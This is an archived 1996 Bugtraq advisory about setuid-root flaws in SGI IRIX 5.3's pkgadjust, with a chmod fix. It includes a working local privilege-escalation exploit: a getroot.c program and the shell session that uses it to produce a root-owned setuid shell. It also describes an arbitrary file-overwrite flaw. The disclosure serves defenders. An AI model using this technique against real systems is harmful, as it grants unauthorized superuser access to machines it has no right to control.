Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Security hole in SGI package installation system

From: hhui () stardot net (Hui-Hui Hu)
Date: Sat, 27 Jan 1996 10:57:02 -0500

There are many major security holes in SGI's package installation system
for IRIX 5.3. The code appears to have been written without proper
consideration of the implications of setuid. Any user can gain superuser
access as well as overwrite-to-destroy files.

The main program that pkg{info,rm,etc} call is /usr/pkg/bin/pkgadjust,
which is setuid root.

PROGRAM.  pkgadjust (from eoe2.sw.oampkg)
AFFECTS.  SGI IRIX 5.3. IRIX 5.2 is not affected; unsure about IRIX 6.
REQUIRED. Account on server
RISK.     superuser
AUTHOR.   Tung-Hui Hu <hhui () stardot net>

---

PROBLEM 1. pkgadjust will allow any user to overwrite any file because it
allows one to set via command line:

     -o        write debugging output to <file> rather than to stderr

Since pkgadjust does not check for ownership, etc. this will destroy the
file, leading to a denial of service/removal of authorization checks.

---

PROBLEM 2. pkgadjust will allow any user to gain superuser access.
One can set programs to list installed packages via command line options

              -a <cmd> normally 'versions long' command line
              -b <cmd> normally 'versions -v' command line

This is trivially exploited:

% cat > getroot.c
int main() { setuid(0); chown("sh",0,0); chmod("sh",04755); return 0; }
% cc getroot.c -o getroot
% cp /bin/sh sh
% ls -la sh
-rwxr-xr-x    1 hhui     user      140784 Jan  5 20:52 sh
% /usr/pkg/bin/pkgadjust -f -a getroot
scanning inst-database

updating pkginfo-files
........................................^C
% ls -la sh
-rwsr-xr-x    1 root     sys       140784 Jan  5 20:52 sh
% panic

---

FIX.

# chmod 700 /usr/pkg/bin/pkgadjust

DISCUSSION. No sermons here, but I really doubt the program was
written for setuid. Since most users can't write to the lockfile
in /var/sadm, many pkg* commands are unavailable. I also found
these files improperly permissioned and would recommend removing setuid:

-rwsr-xr-x    1 root     sys          838 Sep 27 11:27 /usr/lib/X11/
                                                       app-defaults/ISDN
-rws--x--x    1 root     sys        18632 Sep 27 10:59 /usr/pkg/bin/abspath


Tung-Hui Hu         / '97 Comparative Literature / Princeton Universe
hhui () stardot com   / the STATIC: http://www.stardot.com/~hhui/static
Previous By Date Next
Previous By Thread Next

Current thread: